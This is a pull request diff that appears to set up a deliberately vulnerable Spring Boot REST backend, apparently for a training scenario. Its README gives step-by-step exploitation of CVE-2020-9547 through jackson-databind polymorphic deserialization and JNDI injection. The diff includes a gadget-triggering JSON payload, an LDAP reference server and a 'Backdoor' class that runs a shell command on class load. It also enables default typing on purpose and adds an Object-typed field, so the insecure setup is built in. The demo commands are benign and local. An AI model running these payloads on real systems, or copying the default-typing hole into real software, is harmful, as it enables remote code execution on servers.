### PR TITLE
Add initial version of a Spring Boot REST backend

### DIFF
--- a/backend/README.md
+++ b/backend/README.md
@@ -1,0 +1,83 @@
+# Deserialization vulnerabilities in jackson-databind
+
+## Background
+
+Deserialization vulnerabilities in jackson-databind are exploitable if the following conditions hold:
+- Polymorphic type handling has been enabled for jackson-databind (see [here](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062) or [here](https://snyk.io/blog/java-json-deserialization-problems-jackson-objectmapper/))
+- A gadget class, which loads Java classes through JNDI, is in the classpath and has not yet been blocked by the deny-list implemented in jackson-databind
+- The system property `trustURLCodebase` is true, either because the application runs on an old Java version or it has been set explicitely (see [here](https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/))
+
+## Prerequisites
+
+1. Install Java 8+ and Maven
+2. Install server toolkit from https://github.com/welk1n/JNDI-Injection-Exploit in folder `lib`
+
+## Run the application
+
+1. Build the Spring Boot app with `mvn clean package`
+2. Start it with `java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar target/springboot-app-0.0.1-SNAPSHOT.jar`
+    - Note: The system property is required on recent Java versions.
+3. Get JSON with `curl http://localhost:8080/persons/foo`
+4. Post legitimate JSON
+
+```
+curl -X POST -H 'Content-type:application/json;charset=UTF-8' http://localhost:8080/persons -d '
+{ "id" : 2,
+  "firstname" : "John",
+  "lastname" : "Doe",
+  "createdAt" : "2024-02-19T10:35:20.867+0000",
+  "modifiedAt" : "2024-02-19T10:35:20.867+0000"
+}'
+```
+
+## Exploit CVE-2020-9547
+<!--
+1. Start a Web server to host the `com.acme.backdoor.Backdoor`
+
+```
+python3 -m http.server 9000 --directory target/test-classes
+```
+
+2. Start an LDAP server that redirects to the Web server
+
+````sh
+mvn dependency:copy-dependencies
+java -cp target/dependency/unboundid-ldapsdk-3.1.1.jar:target/test-classes \
+    com.acme.jndi.LDAPRefServer \
+    http://localhost:9000#com.acme.backdoor.Backdoor
+````-->
+
+One gadget class of this vulnerability is `br.com.anteros.dbcp.AnterosDBCPConfig` (see [here](https://github.com/fairyming/CVE-2020-9547/blob/master/Poc.java)).
+
+1. Run the LDAP and Web server with `java -jar lib/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a Safari http://www.google.de" -A "127.0.0.1"`
+
+    - The command specified with `-C` will be executed by the Spring Boot application upon deserialization.
+    - Copy one of the `ldap://` URLs shown in the console.
+
+2. Post a JSON that causes jackson-databind to deserialize the gadget class, which downloads and initializes the backdoor (this only works because the attribute `Person#modifiedAt` is of type `Object`, which is where the polymorphic type handling kicks in).
+
+```
+curl -X POST -H 'Content-type:application/json;charset=UTF-8' http://localhost:8080/persons -d '
+{ "id" : 2,
+  "firstname" : "John",
+  "lastname" : "Doe",
+  "createdAt" : "2024-02-19T10:35:20.867+0000",
+  "modifiedAt" : ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "<ldap-url>"}]
+}'
+```
+
+## Exploit other vulnerabilities
+
+- Edit the `pom.xml` to declare dependencies on JARs that include the respective gadget classes.
+- Change the names of the gadget class and attribute in the JSON payload.
+
+## References
+
+- LDAP and Web servers to serve a dummy class upon deserialization
+    - https://github.com/welk1n/JNDI-Injection-Exploit
+    - https://github.com/mbechler/marshalsec
+- Background on JSON deserialization
+    - https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
+    - https://snyk.io/blog/java-json-deserialization-problems-jackson-objectmapper/
+    - https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
+    - https://github.com/mbechler/marshalsec/blob/master/README.md

--- a/backend/pom.xml
+++ b/backend/pom.xml
@@ -1,0 +1,79 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+
+	<parent>
+		<groupId>org.springframework.boot</groupId>
+		<artifactId>spring-boot-starter-parent</artifactId>
+		<version>2.1.13.RELEASE</version>
+		<relativePath />
+	</parent>
+
+	<groupId>com.acme.foo</groupId>
+	<artifactId>springboot-app</artifactId>
+	<version>0.0.1-SNAPSHOT</version>
+	<packaging>jar</packaging>
+
+	<name>REST API</name>
+	<description></description>
+
+	<properties>
+		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+		<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
+		<maven.compiler.source>1.8</maven.compiler.source>
+		<maven.compiler.target>1.8</maven.compiler.target>
+	</properties>
+
+	<dependencies>
+		<dependency>
+			<groupId>org.springframework.boot</groupId>
+			<artifactId>spring-boot-starter-web</artifactId>
+		</dependency>
+		<dependency>
+			<groupId>org.springframework.boot</groupId>
+			<artifactId>spring-boot-starter-data-rest</artifactId>
+		</dependency>
+		
+		<!-- For LDAP reference server (which does not work) -->
+		<dependency>
+			<groupId>com.unboundid</groupId>
+			<artifactId>unboundid-ldapsdk</artifactId>
+			<version>3.1.1</version>
+		</dependency>
+		
+		<!-- CVE-2020-9547 -->
+		<dependency>
+			<groupId>br.com.anteros</groupId>
+			<artifactId>Anteros-Core</artifactId>
+			<version>1.1.9</version>
+		</dependency>
+		<dependency>
+			<groupId>br.com.anteros</groupId>
+			<artifactId>Anteros-DBCP</artifactId>
+			<version>1.0.1</version>
+		</dependency>
+		<dependency>
+			<groupId>com.codahale.metrics</groupId>
+			<artifactId>metrics-healthchecks</artifactId>
+			<version>3.0.2</version>
+		</dependency>
+
+		<!-- Test deps -->
+		<dependency>
+			<groupId>org.springframework.boot</groupId>
+			<artifactId>spring-boot-starter-test</artifactId>
+			<scope>test</scope>
+		</dependency>
+	</dependencies>
+	
+	<build>
+		<plugins>
+			<plugin>
+				<groupId>org.springframework.boot</groupId>
+				<artifactId>spring-boot-maven-plugin</artifactId>
+			</plugin>
+		</plugins>
+	</build>
+</project>

--- a/backend/src/main/java/com/acme/foo/MainController.java
+++ b/backend/src/main/java/com/acme/foo/MainController.java
@@ -1,0 +1,48 @@
+package com.acme.foo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+import org.springframework.boot.web.servlet.support.SpringBootServletInitializer;
+import org.springframework.cache.annotation.EnableCaching;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.ComponentScan;
+import org.springframework.context.annotation.Configuration;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+@Configuration
+@ComponentScan({"com.acme.foo"})
+@EnableAutoConfiguration
+@SpringBootApplication
+@EnableCaching
+public class MainController extends SpringBootServletInitializer {
+
+	public static void main(String[] args) {
+		SpringApplication.run(MainController.class, args);
+
+        // The following is useful to test whether the deserialization of the gadget works indepenently of the invocation of the REST endpoint.
+        /*ObjectMapper mapper = new ObjectMapper();
+        mapper.enableDefaultTyping();
+        String json = "{ \"id\" : 2,\n" + //
+                        "  \"firstname\" : \"John2\",\n" + //
+                        "  \"lastname\" : \"Doe2\",\n" + //
+                        "  \"createdAt\" : \"2024-02-19T10:35:20.867+0000\",\n" + //
+                        "  \"modifiedAt\" : [\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"healthCheckRegistry\": \"ldap://localhost:1389/obj\"}]\n" + //
+                        "}'";
+        try {
+            mapper.readValue(json, Person.class);
+        } catch (IOException e) {
+            e.printStackTrace();
+        }*/
+	}
+	
+	@Bean
+    public ObjectMapper objectMapper() {
+        final ObjectMapper mapper = new ObjectMapper();
+        // mapper.configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);
+        // mapper.configure(MapperFeature.DEFAULT_VIEW_INCLUSION, false);
+        mapper.enableDefaultTyping();//DefaultTyping.JAVA_LANG_OBJECT, As.WRAPPER_ARRAY);
+        return mapper;
+    }
+}

--- a/backend/src/main/java/com/acme/foo/Person.java
+++ b/backend/src/main/java/com/acme/foo/Person.java
@@ -1,0 +1,75 @@
+package com.acme.foo;
+
+import java.util.Date;
+
+public class Person {
+	public int id;
+	public String firstname;
+	public String lastname;
+	
+	public Date createdAt;
+	
+	public Object modifiedAt;
+	
+	public int getId() {
+		return id;
+	}
+
+	public void setId(int id) {
+		this.id = id;
+	}
+
+	public String getFirstname() {
+		return firstname;
+	}
+
+	public void setFirstname(String firstname) {
+		this.firstname = firstname;
+	}
+
+	public String getLastname() {
+		return lastname;
+	}
+
+	public void setLastname(String lastname) {
+		this.lastname = lastname;
+	}
+
+	public Date getCreatedAt() {
+		return createdAt;
+	}
+
+	public void setCreatedAt(Date createdAt) {
+		this.createdAt = createdAt;
+	}
+
+	public Object getModifiedAt() {
+		return modifiedAt;
+	}
+
+	public void setModifiedAt(Object modifiedAt) {
+		this.modifiedAt = modifiedAt;
+		System.out.println("Type of modifiedAt: " + this.modifiedAt.getClass());
+	}
+	
+	public String toString() {
+		// Method[] methods = this.getClass().getDeclaredMethods();
+		// for(Method m: methods) {
+		// 	if(m.getName().startsWith("get")) {
+		// 		try {
+		// 			System.out.println("Return value of [" + m.getName() + "]: [" + m.invoke(this) + "]");
+		// 		} catch (IllegalAccessException e) {
+		// 			// TODO Auto-generated catch block
+		// 			e.printStackTrace();
+		// 		} catch (IllegalArgumentException e) {
+		// 			// TODO Auto-generated catch block
+		// 			e.printStackTrace();
+		// 		} catch (InvocationTargetException e) {
+		// 			// TODO Auto-generated catch block
+		// 			e.printStackTrace();
+		// 		}
+		// 	}
+		// }
+		return this.getFirstname() + " " + this.getLastname();
+	}
+}

--- a/backend/src/main/java/com/acme/foo/PersonApi.java
+++ b/backend/src/main/java/com/acme/foo/PersonApi.java
@@ -1,0 +1,57 @@
+package com.acme.foo;
+
+import java.util.Calendar;
+import java.util.Date;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.http.HttpStatus;
+import org.springframework.http.ResponseEntity;
+import org.springframework.web.bind.annotation.CrossOrigin;
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+@CrossOrigin("*")
+@RequestMapping("/persons")
+public class PersonApi {
+
+	private static Logger log = LoggerFactory.getLogger(PersonApi.class);
+
+	@Autowired
+	PersonApi() {
+		;
+	}
+
+	@RequestMapping(value = "/{id}", method = RequestMethod.GET, produces = { "application/json;charset=UTF-8" })
+	public ResponseEntity<Person> getPerson(@PathVariable String id) {
+		try {
+			final Person p = new Person();
+			p.setId(1);
+			p.setFirstname("John");
+			p.setLastname("Doe");
+
+			final Date d = Calendar.getInstance().getTime();
+			p.setCreatedAt(d);
+			p.setModifiedAt(d);
+			return new ResponseEntity<Person>(p, HttpStatus.OK);
+		} catch (Exception enfe) {
+			return new ResponseEntity<Person>(HttpStatus.NOT_FOUND);
+		}
+	}
+
+	@RequestMapping(value = "", method = RequestMethod.POST, consumes = {
+			"application/json;charset=UTF-8" }, produces = { "application/json;charset=UTF-8" })
+	public ResponseEntity<Person> postPerson(@RequestBody Person person) {
+		try {
+			System.out.println("Upload of person [" + person + "]");
+			return new ResponseEntity<Person>(person, HttpStatus.OK);
+		} catch (Exception enfe) {
+			return new ResponseEntity<Person>(HttpStatus.NOT_FOUND);
+		}
+	}
+}

--- a/backend/src/test/java/com/acme/backdoor/Backdoor.java
+++ b/backend/src/test/java/com/acme/backdoor/Backdoor.java
@@ -1,0 +1,21 @@
+package com.acme.backdoor;
+
+import java.io.IOException;
+
+public class Backdoor {
+    
+    static {
+        System.out.println("*** Malicious class initialized ***");
+        try {
+            Runtime.getRuntime().exec("open http://www.google.de");
+        } catch (IOException e) {
+            e.printStackTrace();
+        }
+    }
+
+    public Backdoor() {}
+
+    public static void main(String[] args) {
+        new Backdoor();
+    }
+}

--- a/backend/src/test/java/com/acme/backdoor/BackdoorTest.java
+++ b/backend/src/test/java/com/acme/backdoor/BackdoorTest.java
@@ -1,0 +1,11 @@
+package com.acme.backdoor;
+
+import org.junit.Test;
+
+public class BackdoorTest {
+    
+    @Test
+    public void testInit() {
+        new Backdoor();
+    }
+}

--- a/backend/src/test/java/com/acme/jndi/LDAPRefServer.java
+++ b/backend/src/test/java/com/acme/jndi/LDAPRefServer.java
@@ -1,0 +1,136 @@
+/* MIT License
+
+Copyright (c) 2017 Moritz Bechler
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+*/
+package com.acme.jndi;
+
+
+import java.net.InetAddress;
+import java.net.MalformedURLException;
+import java.net.URL;
+
+import javax.net.ServerSocketFactory;
+import javax.net.SocketFactory;
+import javax.net.ssl.SSLSocketFactory;
+
+import com.unboundid.ldap.listener.InMemoryDirectoryServer;
+import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
+import com.unboundid.ldap.listener.InMemoryListenerConfig;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPException;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+
+
+/**
+ * LDAP server implementation returning JNDI references
+ * 
+ * @author mbechler
+ *
+ */
+public class LDAPRefServer {
+
+    private static final String LDAP_BASE = "dc=example,dc=com";
+
+
+    public static void main ( String[] args ) {
+        int port = 1389;
+        if ( args.length < 1 || args[ 0 ].indexOf('#') < 0 ) {
+            System.err.println(LDAPRefServer.class.getSimpleName() + " <codebase_url#classname> [<port>]"); //$NON-NLS-1$
+            System.exit(-1);
+        }
+        else if ( args.length > 1 ) {
+            port = Integer.parseInt(args[ 1 ]);
+        }
+
+        try {
+            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
+            config.setListenerConfigs(new InMemoryListenerConfig(
+                "listen", //$NON-NLS-1$
+                InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
+                port,
+                ServerSocketFactory.getDefault(),
+                SocketFactory.getDefault(),
+                (SSLSocketFactory) SSLSocketFactory.getDefault()));
+
+            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ])));
+            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
+            System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
+            ds.startListening();
+
+        }
+        catch ( Exception e ) {
+            e.printStackTrace();
+        }
+    }
+
+    private static class OperationInterceptor extends InMemoryOperationInterceptor {
+
+        private URL codebase;
+
+
+        /**
+         * 
+         */
+        public OperationInterceptor ( URL cb ) {
+            this.codebase = cb;
+        }
+
+
+        /**
+         * {@inheritDoc}
+         *
+         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
+         */
+        @Override
+        public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
+            String base = result.getRequest().getBaseDN();
+            Entry e = new Entry(base);
+            try {
+                sendResult(result, base, e);
+            }
+            catch ( Exception e1 ) {
+                e1.printStackTrace();
+            }
+
+        }
+
+
+        protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException {
+            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
+            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
+            e.addAttribute("javaClassName", "foo");
+            String cbstring = this.codebase.toString();
+            int refPos = cbstring.indexOf('#');
+            if ( refPos > 0 ) {
+                cbstring = cbstring.substring(0, refPos);
+            }
+            e.addAttribute("javaCodeBase", cbstring);
+            e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
+            e.addAttribute("javaFactory", this.codebase.getRef());
+            result.sendSearchEntry(e);
+            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+        }
+
+    }
+}


### PR DESCRIPTION
The Spring Boot REST application coming with this PR uses a pretty old version of Spring Boot whose dependencies are subject to many vulns.

At least one of them, CVE-2020-9547, is exploitable, and the provided README explains in details how to do this.

In order to tweak this application to the envisioned job portal scenario, it is sufficient to add more POJOs and expose them with the existing or new REST controllers.